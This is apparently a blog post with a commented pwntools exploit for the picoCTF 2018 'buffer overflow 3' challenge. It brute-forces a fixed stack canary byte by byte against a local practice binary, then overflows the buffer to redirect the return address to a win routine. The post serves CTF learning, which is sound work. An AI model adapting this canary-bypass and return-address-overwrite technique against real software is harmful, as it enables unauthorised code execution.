System/Pwnable Practice
Pico CTF 2018 Buffer Overflow 3
JeonYoungSin
2019. 7. 27. 22:16
exploit.py
from pwn import *
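# Stage 1: recover the 4-byte stack canary of the local practice binary
# ./vuln, one byte per outer iteration.
#
# Each guess runs in a fresh process, and bytes confirmed earlier are reused.
# That only works if the canary is the same on every run of ./vuln.
# A canary regenerated per process would invalidate the accumulated prefix on
# every spawn, which is why stack protectors randomise it at start-up.
canary = ""
for j in range(0, 4):
    for i in range(0, 256):
        p = process("./vuln")
        try:
            # 0x20 filler bytes, then the known canary prefix, then one guess.
            # NOTE(review): 0x20 is presumably the distance from the buffer
            # to the canary; confirm against the binary.
            payload = "A" * 0x20 + canary + chr(i)
            print p.recvuntil("> ")
            # The first prompt is answered with the payload length, the
            # second with the payload itself.
            p.sendline(str(len(payload)))
            print p.recvuntil("> ")
            p.send(payload)
            try:
                # Seeing "Stack" is treated as a rejected guess (presumably
                # the binary's canary-mismatch message).
                print p.recvuntil("Stack")
            except EOFError:
                # pwntools raises EOFError when the process ends before the
                # marker appears; that is taken as "guess accepted".
                # Catching only EOFError keeps Ctrl-C and unrelated failures
                # from being recorded as a canary byte.
                canary += chr(i)
                break
        finally:
            # Always reap the child, including on the break path, so up to
            # 1024 spawned processes do not leak descriptors.
            p.close()
    else:
        # No candidate was accepted: stop instead of continuing with a
        # canary that is too short.
        raise RuntimeError("no candidate byte accepted at canary offset %d" % j)
print "Found Canary = " + canary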
# Stage 2: send one input that keeps the recovered canary intact and
# overwrites the word after it plus 0xC+4 filler bytes with `win`.
#
# NOTE(review): 0x080486EB is presumably the address of the challenge's win
# routine. A hard-coded address like this only holds if the binary is loaded
# at a fixed base (no PIE/ASLR for the image); confirm against the binary.
win = 0x080486EB

# Layout: filler up to the canary, the canary itself, filler up to the
# overwritten word (presumably the saved return address), then the
# 32-bit packed target.
payload = "".join([
    "A" * 0x20,
    canary,
    "A" * (0xC + 4),
    p32(win),
])

p = process("./vuln")
print p.recvuntil("> ")
# First prompt: declared length. Second prompt: the bytes themselves.
p.sendline(str(len(payload)))
print p.recvuntil("> ")
p.send(payload)
# Print whatever the process prints next (up to 2048 bytes).
print p.recv(2048)